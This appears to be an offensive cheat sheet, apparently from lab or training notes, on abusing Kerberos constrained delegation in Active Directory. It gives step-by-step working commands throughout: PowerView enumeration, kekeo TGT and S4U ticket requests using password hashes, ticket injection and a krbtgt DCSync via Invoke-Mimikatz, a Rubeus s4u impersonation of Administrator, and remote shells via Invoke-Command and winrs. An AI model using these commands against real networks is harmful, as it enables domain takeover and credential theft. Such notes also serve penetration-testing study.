Using PowerShell

Methodology/Steps

List all the users having Constrained Delegation

Keep a note of the msDS-AllowedToDelegateTo value

Request for a TGT using the hash of the user with CD using kekeo (Which me must have collected before)

Keep a note of the TGT return ticket

Now request a TGS with the 2nd step and 4th step values as parameters in /service and /tgt

Keep a note of the TGS return Ticket

Now we can inject the TGS return Ticket with Inkove-Mimikatz

We can now list the file systems of that account. Example : ls \\dc-mysql\C$ but can not use any WMI-Commands. We can use ScriptBlock to execute commands on the system.

But if the user DC we can do the same process and then do a DCSync attack

PowerView [ Dev Branch ]

Enumerate users and computers with CD enabled

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

kekeo

Requesting a TGT

tgt::ask /user:websvc /domain:domain.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgt::ask /user:dcorp-adminsrv /domain:domain.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67

Request a TGS

tgs::s4u /tgt:TGT.kirbi /user:Administrator@domain.local /service:cifs/computer.domain.LOCAL
tgs::s4u /tgt:TGT.kirbi /user:Administrator@domain.local /service:time/computer.domain.LOCAL|ldap/computer.domain.LOCAL

Invoke-Mimikatz

Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS.kirbi"'

Execute DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

ScriptBlock

Inoke-Command -ScriptBlock{whoami} -ComputerName us-mssql.us.techcorp.local

Using Binaries

Methodology/Steps

Use Rubeus to request a TGS for the user and inject it into memory

Remote login the machine using winrs

Rubeus

1. Request for a S4U

Rubeus.exe s4u /user:appsvc /rc4:1D49D390AC01D568F0EE9BE82BB74D4C /impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local /altservice:HTTP /domain:us.techcorp.local /ptt

2. Remote login using winrs

winrs -r:us-mssql cmd.exe

Provide feedback

Saved searches

Use saved searches to filter your results more quickly